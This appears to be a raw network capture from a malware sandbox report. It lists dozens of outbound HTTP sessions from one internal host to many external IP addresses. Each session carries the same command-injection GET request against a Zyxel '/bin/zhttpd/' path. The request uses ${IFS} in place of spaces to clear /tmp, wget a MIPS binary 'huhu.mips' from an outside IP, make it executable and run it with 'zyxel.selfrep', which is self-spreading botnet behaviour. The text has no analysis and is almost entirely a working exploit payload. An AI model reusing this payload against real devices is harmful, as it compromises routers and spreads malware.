                                                        Feb 2, 2024 06:21:03.813764095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2972192.168.2.1455594180.240.104.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813836098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2973192.168.2.1455878133.255.182.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813834906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2974192.168.2.1440366123.170.99.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813877106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2975192.168.2.1455404219.246.145.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813914061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2976192.168.2.1447404118.90.14.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.813971043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2977192.168.2.143648492.83.72.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814013004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2978192.168.2.1458974187.142.195.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814047098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2979192.168.2.1435364103.238.4.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814075947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2980192.168.2.146042270.8.136.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814127922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2981192.168.2.145014258.11.33.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814162016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2982192.168.2.1450738167.238.245.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814198017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2983192.168.2.1457050167.177.146.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814224005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2984192.168.2.1460030110.226.28.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814250946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2985192.168.2.1444318154.137.186.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814296007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2986192.168.2.145505465.223.236.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814337015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2987192.168.2.14435988.210.38.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814371109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2988192.168.2.1436736162.240.46.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814385891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2989192.168.2.1459298178.138.229.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814456940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2990192.168.2.1457380190.99.37.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814486027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2991192.168.2.1439030119.41.170.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814517975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2992192.168.2.1434390219.76.174.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814568043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2993192.168.2.1435048117.229.119.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814591885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2994192.168.2.145151448.174.170.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814635038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2995192.168.2.1455534194.218.182.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814677954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2996192.168.2.1440926142.175.209.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814747095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2997192.168.2.1452392140.92.13.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814773083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2998192.168.2.144862624.175.218.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814799070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2999192.168.2.1443200156.246.246.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814825058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3000192.168.2.1441656205.165.59.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814872026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3001192.168.2.1460420108.104.158.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814901114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3002192.168.2.1441838217.156.117.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814939976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3003192.168.2.1453472103.235.5.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.814982891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3004192.168.2.1458210114.137.210.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815021038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3005192.168.2.1451446223.145.58.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815066099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3006192.168.2.1445162140.1.224.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815097094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3007192.168.2.144739653.183.163.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815139055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3008192.168.2.1439190130.123.45.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815165043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3009192.168.2.145515096.239.34.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815196991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3010192.168.2.1434886212.158.88.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815227032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3011192.168.2.145078214.140.55.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815284967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3012192.168.2.1438916153.72.7.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815325022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3013192.168.2.145958239.64.65.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815359116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3014192.168.2.145036044.71.208.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815397978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3015192.168.2.1458374142.230.41.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815428019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3016192.168.2.1457522174.27.50.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815495968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3017192.168.2.1453490151.109.151.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815525055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3018192.168.2.1443730141.117.63.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815563917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3019192.168.2.1446090213.244.87.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815620899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3020192.168.2.145589284.103.20.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815669060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3021192.168.2.1460112163.33.238.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815701962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3022192.168.2.1435716183.189.127.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815798998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3023192.168.2.1441534147.2.16.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815843105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3024192.168.2.144228623.254.202.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815881968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3025192.168.2.1457482160.33.140.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815907001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3026192.168.2.1442948213.213.215.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.815968990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3027192.168.2.1434344120.53.250.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816009045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3028192.168.2.1460504209.254.4.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816044092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3029192.168.2.144827266.51.247.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816101074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3030192.168.2.1449246194.49.167.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816113949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3031192.168.2.1452876176.138.6.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816138029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3032192.168.2.145716489.27.177.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816198111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3033192.168.2.1459428212.45.67.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816242933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3034192.168.2.1433810203.229.174.25443
                                                        TimestampBytes transferredDirectionData
